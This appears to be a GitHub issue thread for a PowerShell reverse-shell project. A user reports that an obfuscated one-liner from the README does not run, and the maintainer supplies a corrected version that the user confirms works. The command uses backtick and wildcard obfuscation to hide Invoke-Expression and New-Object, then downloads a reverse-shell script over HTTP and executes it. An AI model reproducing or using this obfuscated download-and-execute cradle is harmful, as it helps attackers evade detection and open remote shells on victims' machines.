### ISSUE TITLE
Obfuscation Example in README.md Not Executing

### ISSUE THREAD

**Issue by techstartupexplorer** [tobor88/ReversePowerShell#3]
Looks like this command doesn't work... tried it many times in the powershell cli. can you clarify please how to fire up this obfuscation command tnx

# To obfuscate the above command you can do something like the below command
& (`G`C`M *ke-E*) '(& (`G`C`M *ew-O*) `N`E`T`.`W`E`B`C`L`I`E`N`T)."`D`O`W`N`L`O`A`D`S`T`R`I`N`G"('htt'+'p://'+'127.0.0.1/ReversePowerShell.ps1')

RESULT:

PS C:\Windows\system32> & (`G`C`M *ke-E*) '(& (`G`C`M *ew-O*) `N`E`T`.`W`E`B`C`L`I`E`N`T)."`D`O`W`N`L`O`A`D`S`T`R`I`N`G"('htt'+'p://'+'127.0.0.1/ReversePowerShell.ps1')
**>>**

**Describe the bug**

**To Reproduce**

**Expected behavior**

**Screenshots**

**Desktop (please complete the following information):**

**Smartphone (please complete the following information):**

**Additional context**

**Comment by tobor88** [comment]
Thanks for noticing. I had an extra single quote in there. Also the new versions of powershell thought *ew-O* was New-OAuthSecurityContext so I changed it to *ew-Ob*

```& (`G`C`M *ke-E*) (& (`G`C`M *ew-Ob*) `N`E`T`.`W`E`B`C`L`I`E`N`T)."`D`O`W`N`L`O`A`D`S`T`R`I`N`G"('htt'+'p://'+'127.0.0.1/ReversePowerShell.ps1') ```

**Comment by techstartupexplorer** [comment]
Cool its working ;) thanks!

**Comment by tobor88** [comment]
Right on! No problem
